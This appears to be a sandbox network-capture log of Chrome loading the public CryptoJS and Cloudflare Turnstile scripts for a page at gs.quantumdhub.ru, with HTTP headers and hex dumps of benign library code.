                                                                            2192.168.2.1749713104.17.24.144436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:16 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                            Host: cdnjs.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: script
                                                                            Referer: https://gs.quantumdhub.ru/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:16 UTC965INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:16 GMT
                                                                            Content-Type: application/javascript; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: public, max-age=30672000
                                                                            ETag: W/"61182885-40eb"
                                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                            cf-cdnjs-via: cfworker/kv
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Timing-Allow-Origin: *
                                                                            X-Content-Type-Options: nosniff
                                                                            CF-Cache-Status: HIT
                                                                            Age: 74831
                                                                            Expires: Tue, 09 Dec 2025 14:36:16 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BpPd2TeYzIDYryS3lJJMju59pr%2FV%2FA%2B86aLqSB%2B6nRkssHFnfQsczgaOeq4kaRA2NxZYMvbRdNCsEmrhgxbkfOLTjQ206F2g%2BD0unhrYlYOWJwrS1%2BbkLQ9l1nJDeMQ60ZRAscrG"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                            Strict-Transport-Security: max-age=15780000
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481fbc3ecf72ab-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:16 UTC404INData Raw: 37 62 65 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                            Data Ascii: 7bec!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                            2024-12-19 14:36:16 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65
                                                                            Data Ascii: =typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Obje
                                                                            2024-12-19 14:36:16 UTC1369INData Raw: 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f
                                                                            Data Ascii: clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.rando
                                                                            2024-12-19 14:36:16 UTC1369INData Raw: 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61
                                                                            Data Ascii: g"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a
                                                                            2024-12-19 14:36:16 UTC1369INData Raw: 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45
                                                                            Data Ascii: ){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E
                                                                            2024-12-19 14:36:16 UTC1369INData Raw: 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c
                                                                            Data Ascii: 0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<
                                                                            2024-12-19 14:36:16 UTC1369INData Raw: 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e
                                                                            Data Ascii: .buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={strin
                                                                            2024-12-19 14:36:16 UTC1369INData Raw: 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a
                                                                            Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJ
                                                                            2024-12-19 14:36:16 UTC1369INData Raw: 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72
                                                                            Data Ascii: a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                                            2024-12-19 14:36:16 UTC1369INData Raw: 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c
                                                                            Data Ascii: ,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.1749714104.18.94.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:16 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: script
                                                                            Referer: https://gs.quantumdhub.ru/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:16 UTC386INHTTP/1.1 302 Found
                                                                            Date: Thu, 19 Dec 2024 14:36:16 GMT
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                            cross-origin-resource-policy: cross-origin
                                                                            location: /turnstile/v0/b/787bc399e22f/api.js
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481fbc396c43eb-EWR
                                                                            alt-svc: h3=":443"; ma=86400


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.1749720104.18.94.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:18 UTC648OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: script
                                                                            Referer: https://gs.quantumdhub.ru/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:18 UTC471INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:18 GMT
                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                            Content-Length: 47692
                                                                            Connection: close
                                                                            accept-ranges: bytes
                                                                            last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                            access-control-allow-origin: *
                                                                            cross-origin-resource-policy: cross-origin
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481fc6d9d2c470-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:18 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                            Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
